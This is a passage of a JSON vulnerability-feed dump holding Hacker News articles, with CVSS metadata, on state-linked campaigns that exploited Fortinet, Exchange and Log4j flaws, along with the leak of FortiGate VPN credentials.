9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-08T13:12:00", "type": "thn", "title": "Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-13T05:39:44", "id": "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "href": "https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-cKikIN2o4zA/YK5pX-ibrqI/AAAAAAAACpU/sp4zF_WZEkMPqmuvXXvmNfX9jnVnVLdkwCLcBGAsYHQ/s0/data-wiper-ransomware.jpg>)\n\nResearchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)'' that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called [PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg6QgmIugjApGsSp_v-DgmrWh7TAwmgc2-q7he3aZA3LmwS3p9FJchpB4duBUG7J8wctZHQGDUg2jvObX6Lto5BZUAMDX2xH7JG8EDRyjRmSLmiaQl8rgHeOaQhlEL7oZDJgxSQOX8XlQiMQHLt36bKZAAJU2uaq2rKhruJOh9LNq60PhKcZc8Lj6Dn/s728-e100/hackers.jpg>)\n\nMicrosoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium andd that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims using malicious tools dubbed CreepyDrive and CreepyBox.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-09T08:35:28", "description": "[](<https://thehackernews.com/images/-05Y4azfOtHY/YTmz5X6CzVI/AAAAAAAADwU/FmcJruB5qJM-D9XZtYFV-FPRYfwHpYpHwCLcBGAsYHQ/s0/vpng.jpg>)\n\nNetwork security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[](<https://thehackernews.com/images/-HU-9TZrc8Wo/YTm0pyWYXXI/AAAAAAAADwc/12l08TWEhOUM6FKznJkQu0G8qDlpbkrcACLcBGAsYHQ/s0/leak.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. \n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\n[](<https://thehackernews.com/images/-qUrCccGMLeI/YTm0raORfPI/AAAAAAAADwg/R5dmT1pkUKwnRGYKr_SGB-GiTdIvnz1GACLcBGAsYHQ/s0/stats.jpg>)\n\nCVE-2018-13379 also emerged as one of the [top most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above followed by initiating an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[](<https://thehackernews.com/images/--04MOd8YdVg/YN6wbhVl-jI/AAAAAAAADD0/1Sag5ybubFo60Vyq--khtAQnmmKIjcy5ACLcBGAsYHQ/s0/russian-hacking.jpg>)\n\nAn ongoing brute-force attack campaign targeting enterprise cloud environments has been spearheaded by the Russian military intelligence since mid-2019, according to a joint advisory published by intelligence agencies in the U.K. and U.S.\n\nThe National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and the U.K.'s National Cyber Security Centre (NCSC) formally attributed the incursions to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).\n\nThe [threat actor](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) is also tracked under various monikers, including [APT28](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt28.html>) (FireEye Mandiant), [Fancy Bear](<https://www.crowdstrike.com/blog/who-is-fancy-bear/>) (CrowdStrike), [Sofacy](<https://www.kaspersky.com/about/press-releases/2018_sofacy>) (Kaspersky), [STRONTIUM](<https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/>) (Microsoft), and [Iron Twilight](<https://www.secureworks.com/research/threat-profiles/iron-twilight>) (Secureworks).\n\nAPT28 has a track record of leveraging password spray and brute-force login attempts to plunder valid credentials that enable future surveillance or intrusion operations. In November 2020, Microsoft [disclosed](<https://blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/>) credential harvesting activities staged by the adversary aimed at companies involved in researching vaccines and treatments for COVID-19.\n\nWhat's different this time around is the actor's reliance on software containers to scale its brute-force attacks.\n\n\"The campaign uses a Kubernetes cluster in brute force access attempts against the enterprise and cloud environments of government and private sector targets worldwide,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/01/nsa-cisa-ncsc-fbi-joint-cybersecurity-advisory-russian-gru-brute>). \"After obtaining credentials via brute force, the GTsSS uses a variety of known vulnerabilities for further network access via remote code execution and lateral movement.\"\n\nSome of the other security flaws exploited by APT28 to pivot inside the breached organizations and gain access to internal email servers include -\n\n * [**CVE-2020-0688**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0688>) \\- Microsoft Exchange Validation Key Remote Code Execution Vulnerability\n * [**CVE-2020-17144**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>) \\- Microsoft Exchange Remote Code Execution Vulnerability\n\nThe threat actor is also said to have utilized different evasion techniques in an attempt to disguise some components of their operations, including routing brute-force authentication attempts through Tor and commercial VPN services, such as CactusVPN, IPVanish, NordVPN, ProtonVPN, Surfshark, and WorldVPN.\n\nThe agencies said the attacks primarily focused on the U.S. and Europe, targeting government and military, defense contractors, energy companies, higher education, logistics companies, law firms, media companies, political consultants or political parties, and think tanks.\n\n\"Network managers should adopt and expand usage of multi-factor authentication to help counter the effectiveness of this capability,\" the advisory [noted](<https://www.nsa.gov/news-features/press-room/Article/2677750/nsa-partners-release-cybersecurity-advisory-on-brute-force-global-cyber-campaign/>). \"Additional mitigations to ensure strong access controls include time-out and lock-out features, the mandatory use of strong passwords, implementation of a Zero Trust security model that uses additional attributes when determining access, and analytics to detect anomalous accesses.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T06:23:00", "type": "thn", "title": "NSA, FBI Reveal Hacking Methods Used by Russian Military Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2021-07-03T14:44:51", "id": "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "href": "https://thehackernews.com/2021/07/nsa-fbi-reveal-hacking-methods-used-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-2P9JF1_9yIc/YMdax55TYnI/AAAAAAAAC2o/YR05yeE9O-8JHf9oekreAzoMGSYXbsdlwCLcBGAsYHQ/s0/suppply-chain-cyberattack.jpg>)\n\nA new cyber espionage group named Gelsemium has been linked to a [supply chain attack targeting the NoxPlayer](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) Android emulator that was disclosed earlier this year.\n\nThe findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename [Operation TooHash](<https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf>) based on malware payloads deployed in those intrusions.\n\n\"Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,\" cybersecurity firm ESET [said](<https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/>) in an analysis published last week.\n\n\"Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.\"\n\nTargeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.\n\nSince its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities ([CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>)) and watering holes to a remote code execution flaw in Microsoft Exchange Server \u2014 likely [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>), which was addressed by the Windows maker in [June 2020](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) \u2014 to deploy the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell.\n\n[](<https://thehackernews.com/images/-erpEkE7yQsA/YMdYTWXAq3I/AAAAAAAAC2g/aFWtWeFaNBkcFx5QqUn08XgGEREESzmBQCLcBGAsYHQ/s0/malware.jpg>)\n\nAccording to ESET, Gelsemium's first stage is a C++ dropper named \"Gelsemine,\" which deploys a loader \"Gelsenicine\" onto the target system, which, in turn, retrieves and executes the main malware \"**Gelsevirine**\" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.\n\nThe adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed \"**Operation NightScout**,\" in which the software's update mechanism was compromised to install backdoors such as **Gh0st RAT** and **PoisonIvy RAT** to spy on its victims, capture keystrokes, and gather valuable information.\n\n\"Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,\" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.\n\nWhat's more, another backdoor called **Chrommme**, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.\n\n\"The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,\" the researchers concluded. \"The plug-in system shows that developers have deep C++ knowledge.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T13:34:00", "type": "thn", "title": "NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2020-0688"], "modified": "2021-06-14T13:34:33", "id": "THN:9B536B531E6948881A29BEC793495D1E", "href": "https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the 